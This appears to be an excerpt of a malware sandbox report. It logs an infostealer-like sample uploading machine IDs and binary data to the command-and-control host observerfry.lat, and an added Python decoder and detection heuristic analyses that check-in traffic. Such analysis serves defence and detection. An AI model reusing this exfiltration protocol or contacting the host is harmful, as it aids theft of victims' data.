                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6f 66 62 37 45 69 76 4d 48 33 32 46 37 36 76 63 2b 63 65 5a 4b 6d 6e 57 33 36 2b 46 67 57 5a 51 72 47 31 31 2f 31 5a 67 4c 76 65 55 52 56 74 6a 6d 69 32 2f 58 47 55 72 32 71 69 49 49 32 6b 71 4c 62 4f 72 6d 77 47 6c 68 6e 45 59 6d 49 48 74 56 6b 44 75 78 75 51 55 7a 79 4c 4f 50 4e 75 73 39 55 2b 76 72 42 67 7a 65 55 70 39 30 6e 73 76 74 66 48 58 49 43 77 4e 31 54 39 58 6b 48 34 48 6c 4d 57 72 67 35 6f 74 37 2b 78 56 57 38 6f 6f 48 46 64 39 57 74 78 58 58 69 73 48 63 64 63 41 37 46 78 68 7a 50 4e 42 4b 68 59 77 78 61 76 6e 50 31 6c 50 4c 4e 57 37 6d 70 6a 6f 59 78 6e 72 6a 64 4a 37 7a 39 55 51 70 6d 44 4d 66 61 58 65 64 2b 41 2b 6c 35 52 56 61 37 4e 71 72 51 75 6f 59 59 76 62 72 42 33 58 6d 30 70 39 59 35 73 4f 64 55 57 48 39 48 30 4a 42 5a 2b 54 52 56 72
                                                                                                                                                                    Data Ascii: ofb7EivMH32F76vc+ceZKmnW36+FgWZQrG11/1ZgLveURVtjmi2/XGUr2qiII2kqLbOrmwGlhnEYmIHtVkDuxuQUzyLOPNus9U+vrBgzeUp90nsvtfHXICwN1T9XkH4HlMWrg5ot7+xVW8ooHFd9WtxXXisHcdcA7FxhzPNBKhYwxavnP1lPLNW7mpjoYxnrjdJ7z9UQpmDMfaXed+A+l5RVa7NqrQuoYYvbrB3Xm0p9Y5sOdUWH9H0JBZ+TRVr
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 79 66 65 33 54 34 6f 67 41 2b 6f 69 43 6b 54 71 66 36 4f 67 32 74 50 35 54 44 69 41 57 68 38 6b 65 38 6e 68 4e 74 7a 70 42 58 4c 6f 31 76 39 76 33 79 31 61 30 72 59 53 4b 4d 5a 57 71 30 44 43 2b 2b 31 38 62 62 51 33 62 32 6c 37 39 63 51 7a 6c 63 41 77 54 38 6a 53 31 6c 4b 4b 49 61 61 32 70 77 37 41 36 6d 36 54 61 49 2f 72 76 47 67 45 67 44 73 57 51 42 72 56 35 42 65 70 2f 51 31 79 34 50 61 6a 65 39 73 42 57 75 62 43 4f 67 54 6d 5a 6f 74 63 34 74 50 52 63 45 57 73 43 7a 39 42 66 2f 7a 52 44 72 33 31 55 48 65 70 7a 6d 64 50 32 78 56 66 34 6c 34 4b 4c 4e 35 4b 38 6e 53 72 30 36 52 51 66 62 45 6d 52 6b 46 4c 38 64 41 62 6c 66 6b 78 61 76 7a 61 75 30 2f 6e 46 58 37 43 73 68 6f 45 31 6e 4b 66 62 4e 62 33 30 55 51 70 6c 41 4d 58 63 48 72 73 30 43 76 63 36 46 42
                                                                                                                                                                    Data Ascii: yfe3T4ogA+oiCkTqf6Og2tP5TDiAWh8ke8nhNtzpBXLo1v9v3y1a0rYSKMZWq0DC++18bbQ3b2l79cQzlcAwT8jS1lKKIaa2pw7A6m6TaI/rvGgEgDsWQBrV5Bep/Q1y4Paje9sBWubCOgTmZotc4tPRcEWsCz9Bf/zRDr31UHepzmdP2xVf4l4KLN5K8nSr06RQfbEmRkFL8dAblfkxavzau0/nFX7CshoE1nKfbNb30UQplAMXcHrs0Cvc6FB
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6c 4b 4b 49 55 62 4f 77 6a 34 73 77 6d 4b 7a 56 4d 72 54 39 58 78 35 72 44 73 37 57 55 2f 31 35 43 4f 78 37 53 46 65 67 4d 4b 62 65 39 38 49 59 39 4f 4b 47 6e 58 6e 4e 36 76 6f 35 6b 2b 42 50 43 6e 5a 4a 31 70 35 48 74 58 4d 42 72 79 49 4d 58 72 30 36 6f 74 7a 79 78 31 65 2b 72 49 65 44 4e 4a 43 6c 31 79 65 79 2f 6c 6b 54 62 77 4c 62 30 46 50 78 65 41 6e 6e 63 55 59 64 2f 48 4f 71 7a 4c 71 51 47 49 2b 76 6a 6f 55 36 67 2b 72 43 65 36 4f 77 55 78 51 67 55 59 6e 63 55 50 56 37 41 65 4e 78 52 46 79 2b 50 61 72 52 38 38 42 51 71 4b 4f 46 6a 54 69 62 70 64 77 78 76 2f 56 51 48 32 51 50 78 70 41 51 74 58 4d 56 72 79 49 4d 63 70 55 47 37 2f 58 41 69 45 66 30 75 38 47 43 4e 64 58 79 6e 54 6d 35 2f 46 77 58 5a 67 44 46 32 6c 66 2b 65 41 62 72 64 6b 56 59 74 44 4b
                                                                                                                                                                    Data Ascii: lKKIUbOwj4swmKzVMrT9Xx5rDs7WU/15COx7SFegMKbe98IY9OKGnXnN6vo5k+BPCnZJ1p5HtXMBryIMXr06otzyx1e+rIeDNJCl1yey/lkTbwLb0FPxeAnncUYd/HOqzLqQGI+vjoU6g+rCe6OwUxQgUYncUPV7AeNxRFy+ParR88BQqKOFjTibpdwxv/VQH2QPxpAQtXMVryIMcpUG7/XAiEf0u8GCNdXynTm5/FwXZgDF2lf+eAbrdkVYtDK
                                                                                                                                                                    2024-12-23 07:04:12 UTC900INData Raw: 6c 2b 7a 73 49 2b 49 4e 70 32 69 31 44 53 2b 39 56 6b 65 62 41 50 49 31 31 44 37 66 45 32 68 4f 6b 74 46 38 6d 76 74 39 65 72 54 53 71 79 76 6f 49 67 32 31 62 57 54 4c 50 72 33 57 46 67 34 53 63 44 43 57 76 68 6d 42 4f 68 30 51 31 36 67 4d 71 44 66 36 4d 39 58 76 71 57 4e 67 7a 61 54 71 39 67 2f 74 76 64 52 45 32 38 46 69 5a 34 65 38 6d 78 4e 74 7a 70 69 56 71 45 6b 72 74 72 78 33 6b 50 36 76 63 2b 63 65 5a 4b 6d 6e 57 33 36 38 31 38 54 5a 41 6e 46 30 46 72 34 64 42 2f 67 66 55 74 55 75 53 47 6e 30 2f 33 44 55 4c 47 74 68 35 63 31 6d 37 6a 59 4a 36 69 77 47 6c 68 6e 45 59 6d 49 48 73 4e 7a 48 66 39 35 44 6d 79 6b 4d 4c 76 66 39 38 51 59 70 65 79 59 78 54 36 5a 36 6f 56 31 76 50 39 64 47 32 38 49 77 4e 78 54 38 48 30 49 37 6e 78 49 56 37 67 7a 71 39 4c 37
                                                                                                                                                                    Data Ascii: l+zsI+INp2i1DS+9VkebAPI11D7fE2hOktF8mvt9erTSqyvoIg21bWTLPr3WFg4ScDCWvhmBOh0Q16gMqDf6M9XvqWNgzaTq9g/tvdRE28FiZ4e8mxNtzpiVqEkrtrx3kP6vc+ceZKmnW36818TZAnF0Fr4dB/gfUtUuSGn0/3DULGth5c1m7jYJ6iwGlhnEYmIHsNzHf95DmykMLvf98QYpeyYxT6Z6oV1vP9dG28IwNxT8H0I7nxIV7gzq9L7
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 33 34 39 64 0d 0a 79 71 6f 47 44 4d 35 47 70 31 44 61 39 2b 56 49 54 59 77 50 47 31 31 6a 78 64 41 62 6f 64 45 70 59 75 54 72 74 6d 72 72 50 51 50 72 36 77 61 4d 61 68 37 6a 76 4f 37 6e 72 46 41 63 75 45 49 6e 58 55 72 55 73 54 65 52 79 51 30 2b 33 4f 71 58 51 38 38 68 63 73 4b 2b 47 68 54 79 59 72 39 6b 37 76 76 64 55 46 47 38 4f 77 64 39 61 39 58 74 4e 6f 54 70 4c 52 66 4a 72 37 66 54 78 33 6e 6d 30 71 5a 50 46 4a 74 75 7a 6e 54 4b 32 73 41 78 59 62 67 44 49 32 46 44 35 66 41 6e 39 65 6b 64 55 76 54 4b 69 31 50 6e 4a 55 72 4b 77 68 34 55 79 6e 61 33 56 4d 62 54 69 56 52 63 67 52 34 6e 58 52 72 55 73 54 64 35 73 53 31 71 39 63 59 54 54 34 63 6c 53 75 61 6d 4e 78 53 62 62 73 35 30 79 74 72 41 4d 57 47 30 46 78 4e 52 4d 2b 58 51 4e 35 6e 31 47 54 37 30 38
                                                                                                                                                                    Data Ascii: 349dyqoGDM5Gp1Da9+VITYwPG11jxdAbodEpYuTrtmrrPQPr6waMah7jvO7nrFAcuEInXUrUsTeRyQ0+3OqXQ88hcsK+GhTyYr9k7vvdUFG8Owd9a9XtNoTpLRfJr7fTx3nm0qZPFJtuznTK2sAxYbgDI2FD5fAn9ekdUvTKi1PnJUrKwh4Uyna3VMbTiVRcgR4nXRrUsTd5sS1q9cYTT4clSuamNxSbbs50ytrAMWG0FxNRM+XQN5n1GT708
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 4a 66 74 4c 43 41 6a 7a 57 55 72 64 6f 2b 71 50 74 47 45 32 67 4b 78 39 68 58 39 58 6f 4e 37 6e 64 4d 48 66 78 7a 71 73 79 36 6b 42 69 66 67 5a 61 54 4d 39 65 4a 79 69 4f 77 39 31 67 4f 61 77 6a 4b 78 6c 50 6c 4e 45 4f 76 61 30 74 4d 38 6d 75 37 78 4f 33 50 52 2f 53 37 77 59 49 31 31 66 4b 64 50 72 58 2b 57 52 4e 6b 41 4d 7a 59 58 66 42 78 42 2b 4e 32 54 56 57 37 4f 61 6a 52 2f 4d 4a 62 74 4b 32 41 69 54 32 63 70 4e 52 31 39 4c 42 54 41 43 42 52 69 65 5a 4f 38 6d 77 41 2f 7a 68 2b 58 71 4d 69 75 4e 6e 71 7a 68 71 56 6f 59 32 47 50 4a 4b 36 6e 53 72 30 36 52 51 66 62 45 6d 52 6b 46 37 78 65 41 37 6f 64 45 4e 51 76 54 53 6d 32 2f 44 47 53 72 57 6e 69 59 6b 78 6d 4c 6a 58 50 36 6a 35 58 52 56 75 41 64 76 54 48 72 73 30 43 76 63 36 46 42 32 41 4f 61 37 59 37
                                                                                                                                                                    Data Ascii: JftLCAjzWUrdo+qPtGE2gKx9hX9XoN7ndMHfxzqsy6kBifgZaTM9eJyiOw91gOawjKxlPlNEOva0tM8mu7xO3PR/S7wYI11fKdPrX+WRNkAMzYXfBxB+N2TVW7OajR/MJbtK2AiT2cpNR19LBTACBRieZO8mwA/zh+XqMiuNnqzhqVoY2GPJK6nSr06RQfbEmRkF7xeA7odENQvTSm2/DGSrWniYkxmLjXP6j5XRVuAdvTHrs0Cvc6FB2AOa7Y7
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6e 68 72 73 48 6d 36 33 4a 4d 72 54 32 56 46 67 75 53 63 61 51 42 73 77 30 52 61 39 46 41 68 32 71 63 2f 57 55 7a 38 74 57 74 4b 57 58 6c 48 53 32 76 63 73 2f 6f 62 4a 79 48 33 45 41 33 39 31 4d 74 54 70 4e 36 54 6f 55 44 66 78 7a 71 63 57 36 6b 41 6a 6f 2b 64 54 57 62 73 58 34 77 6e 75 6a 73 45 4a 59 4f 46 75 48 6b 45 79 31 4c 45 32 6f 65 56 35 50 74 44 43 37 31 37 33 32 5a 70 71 70 6c 34 51 30 6e 71 62 6a 43 36 2f 7a 57 68 5a 6e 48 39 69 51 45 4c 56 37 54 62 64 44 44 42 58 79 44 4f 4f 55 34 6f 67 41 2b 70 65 43 69 7a 65 53 76 4d 78 34 6d 76 74 43 47 57 30 43 78 5a 4a 66 2b 47 51 4b 72 7a 51 4d 57 2f 4a 72 2f 5a 71 36 7a 45 6e 36 2b 74 48 58 59 73 44 35 69 6d 58 6f 37 78 6f 42 49 42 2b 4a 69 41 79 37 4e 42 2b 76 49 67 77 61 73 53 47 2f 30 76 6e 65 57 2f
                                                                                                                                                                    Data Ascii: nhrsHm63JMrT2VFguScaQBsw0Ra9FAh2qc/WUz8tWtKWXlHS2vcs/obJyH3EA391MtTpN6ToUDfxzqcW6kAjo+dTWbsX4wnujsEJYOFuHkEy1LE2oeV5PtDC71732Zpqpl4Q0nqbjC6/zWhZnH9iQELV7TbdDDBXyDOOU4ogA+peCizeSvMx4mvtCGW0CxZJf+GQKrzQMW/Jr/Zq6zEn6+tHXYsD5imXo7xoBIB+JiAy7NB+vIgwasSG/0vneW/
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 65 5a 50 71 68 57 66 30 73 46 41 4a 49 46 47 5a 67 67 57 67 4a 31 71 2f 4b 46 4d 54 71 33 4f 37 6c 4b 4b 61 46 76 71 77 77 64 31 35 30 71 6e 50 4a 37 7a 7a 51 68 73 6e 4e 2f 66 32 58 66 4a 79 44 75 46 74 58 52 2b 64 4d 4b 62 59 39 73 39 4f 68 4a 79 55 68 6a 65 62 72 63 73 6b 2b 72 34 55 46 79 42 52 38 4a 42 50 2f 33 4e 42 70 7a 5a 64 54 72 77 34 75 39 4f 36 39 78 62 36 75 73 48 64 65 61 43 70 30 7a 75 39 35 6b 56 56 52 67 72 4f 31 6c 33 37 59 78 79 76 4e 41 78 62 38 6d 76 2f 6d 72 72 4d 53 66 72 36 30 64 64 69 77 50 6d 4b 5a 65 6a 76 47 67 45 67 48 34 6d 49 44 62 73 30 48 36 38 69 44 42 71 38 50 71 7a 58 39 4d 74 4b 71 4b 53 43 6b 7a 72 53 6c 4f 4d 51 74 2f 31 52 46 6d 63 33 39 2f 46 55 35 58 6b 43 36 45 52 79 61 71 4d 30 76 5a 62 63 79 30 36 35 34 73 2f
                                                                                                                                                                    Data Ascii: eZPqhWf0sFAJIFGZggWgJ1q/KFMTq3O7lKKaFvqwwd150qnPJ7zzQhsnN/f2XfJyDuFtXR+dMKbY9s9OhJyUhjebrcsk+r4UFyBR8JBP/3NBpzZdTrw4u9O69xb6usHdeaCp0zu95kVVRgrO1l37YxyvNAxb8mv/mrrMSfr60ddiwPmKZejvGgEgH4mIDbs0H68iDBq8PqzX9MtKqKSCkzrSlOMQt/1RFmc39/FU5XkC6ERyaqM0vZbcy0654s/


Session ID: 2 | Source IP: 192.168.2.10 | Source Port: 49709 | Destination IP: 104.21.36.201 | Destination Port: 443 | PID: 7200 | Process: C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:14 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=0EJN6A3PZ
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 12799
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:14 UTC12799OUTData Raw: 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                    Data Ascii: --0EJN6A3PZContent-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--0EJN6A3PZContent-Disposition: form-data; name="pid"2--0EJN6A3PZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0EJN6A3PZConten
2024-12-23 07:04:15 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:15 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=t2g25ugpsp5tsi54rbfqip4nhl; expires=Fri, 18 Apr 2025 00:50:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mT%2Bq%2FjQ4xSmiqc7NuOXFjGPvsEpRcl26y9%2F99gccuPrBEGv%2FRdqMyoHBU9FfB6wjKz3XWyIhsqxQMPJSoFLBCTEdqs0MJQU3HBV9pLdHKHLqPTte2pFXLdFDWJSiURKe%2BLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f13cf697cb4-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1939&rtt_var=742&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13729&delivery_rate=1461461&cwnd=230&unsent_bytes=0&cid=2f4438594be7c192&ts=1363&x=0"
2024-12-23 07:04:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:04:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.10 | Source Port: 49715 | Destination IP: 104.21.36.201 | Destination Port: 443 | PID: 7200 | Process: C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:17 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=QP80O4MCUY78Z
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 15050
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:17 UTC15050OUTData Raw: 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 50 38 30 4f
                                                                                                                                                                    Data Ascii: --QP80O4MCUY78ZContent-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--QP80O4MCUY78ZContent-Disposition: form-data; name="pid"2--QP80O4MCUY78ZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QP80O
2024-12-23 07:04:18 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=i3lt6holqqag94pqnq1aagecvi; expires=Fri, 18 Apr 2025 00:50:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eQc8v9fornJyOpY64I6nnG4lS6hwBRF6n8myOI4xdnDKKl5ieEetwzK6s4I0BZfdCt0jTvLbazjiw4cD4McMEVy00lz77mznyykG7KKGX2M%2BAxqOV6EFPzUSTIJWILK%2BkY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f24ac0d43a9-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1650&rtt_var=628&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15984&delivery_rate=1730883&cwnd=245&unsent_bytes=0&cid=8742977ee10d7d87&ts=982&x=0"
2024-12-23 07:04:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:04:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
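The three sessions above all follow the same shape: a POST /api with a multipart/form-data body whose first fields are hwid (a 32-character hex machine ID), pid and lid (here LOGS11--LiveTraffic), answered by a chunked 200 OK whose only payload is "ok 8.46.123.189". The leading "f" in the Data Ascii line is chunked-transfer framing (hex length 15), not part of the reply text. The Python below is an added example written for this report, not code from Joe Sandbox or from the sample: it rebuilds the request body from the three fields shown (the closing boundary line is an assumption, since the report only shows the start of the 12799-byte body), de-chunks the reply bytes copied from the report's hex dump, and applies an editor-written hunting heuristic for this check-in pattern, which is an assumption derived from these captures rather than a published LummaC signature.

```python
"""Decode the observed check-in traffic (POST /api + chunked reply).

Added example for this report, not Joe Sandbox or malware code. The request
body is constructed from the hwid/pid/lid fields shown in the capture; the
closing boundary is assumed. The reply bytes are the report's hex dump.
"""
import re

BOUNDARY = "0EJN6A3PZ"

# Constructed from the capture (first three form fields); closing boundary assumed.
SAMPLE_REQUEST_BODY = (
    b"--0EJN6A3PZ\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n"
    b"B67E080D687E6C19AC8923850305D13E\r\n"
    b"--0EJN6A3PZ\r\nContent-Disposition: form-data; name=\"pid\"\r\n\r\n2\r\n"
    b"--0EJN6A3PZ\r\nContent-Disposition: form-data; name=\"lid\"\r\n\r\n"
    b"LOGS11--LiveTraffic\r\n"
    b"--0EJN6A3PZ--\r\n"
)

# The two "Data Raw" chunks of the 200 OK reply, exactly as hex in the report.
SAMPLE_REPLY_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated 'Data Raw' hex string back into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def decode_chunked(data: bytes) -> bytes:
    """Strip HTTP/1.1 chunked framing: <hexlen>\\r\\n<payload>\\r\\n ... 0\\r\\n\\r\\n."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last chunk; trailers, if any, are ignored
        out += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk payload not followed by CRLF")
        pos += 2


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body.

    Tolerates a truncated body with no closing boundary, which is what the
    report's Data Raw excerpts look like.
    """
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):
            break  # closing boundary reached
        part = part.removeprefix(b"\r\n").removesuffix(b"\r\n")
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode()] = value
    return fields


HWID_RE = re.compile(rb"^[0-9A-F]{32}$")
LID_RE = re.compile(rb"^[A-Z0-9]+--[A-Za-z0-9]+$")


def looks_like_checkin(method: str, path: str, content_type: str, fields: dict) -> bool:
    """Editor's heuristic (assumption): POST /api, multipart body, hwid/pid/lid triplet."""
    return (
        method == "POST"
        and path == "/api"
        and content_type.startswith("multipart/form-data")
        and all(k in fields for k in ("hwid", "pid", "lid"))
        and HWID_RE.match(fields["hwid"]) is not None
        and fields["pid"].isdigit()
        and LID_RE.match(fields["lid"]) is not None
    )


def parse_reply(raw_chunked: bytes) -> tuple:
    """De-chunk the C2 reply and split it into (status word, argument)."""
    text = decode_chunked(raw_chunked).decode("ascii", "replace").strip()
    status, _, arg = text.partition(" ")
    return status, arg


if __name__ == "__main__":
    fields = parse_multipart(SAMPLE_REQUEST_BODY, BOUNDARY)
    print(fields)
    print(looks_like_checkin("POST", "/api", "multipart/form-data; boundary=" + BOUNDARY, fields))
    print(parse_reply(hexdump_to_bytes(SAMPLE_REPLY_HEX)))
```

Feeding the report's own hex into hexdump_to_bytes and decode_chunked yields ("ok", "8.46.123.189") for every session, so the server acknowledges each upload and echoes an IP address; the heuristic is meant for hunting in proxy logs and should be tuned against benign multipart traffic before it is used for alerting.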


Session ID: 4 | Source IP: 192.168.2.10 | Source Port: 49721 | Destination IP: 104.21.36.201 | Destination Port: 443 | PID: 7200 | Process: C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:19 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=AOLLEKSDMMCQNPI9
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 20430
                                                                                                                                                                    Host: observerfry.lat
2024-12-23 07:04:19 UTC | 15331 | OUT | Data Raw: (hex dump omitted; decoded ASCII below)
Data Ascii (multipart body; line breaks restored from the CRLFs in the raw bytes, dump truncated by the report):
--AOLLEKSDMMCQNPI9
Content-Disposition: form-data; name="hwid"

B67E080D687E6C19AC8923850305D13E
--AOLLEKSDMMCQNPI9
Content-Disposition: form-data; name="pid"

3
--AOLLEKSDMMCQNPI9
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
2024-12-23 07:04:19 UTC | 5099 | OUT | Data Raw: (non-printable binary payload; hex dump omitted)
2024-12-23 07:04:20 UTC | 1132 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ss64ui103aqmq6otnhuptvpfbl; expires=Fri, 18 Apr 2025 00:50:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tt66JHmDewnXT1R1qG2QHMnbOiFUVJsaidFj07TTGBI13jQ3OZRvrL%2B9a9xPBwzDUToiwpkBd5Hq%2F%2FTXuXDMNuNi1EZ6qhbyplxC3nU%2FkOX%2FLUllu6nvS9U4Qz6ywlOt5L8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667f33b8488c8f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1995&rtt_var=751&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21389&delivery_rate=1453459&cwnd=209&unsent_bytes=0&cid=71adc31d16456469&ts=1028&x=0"
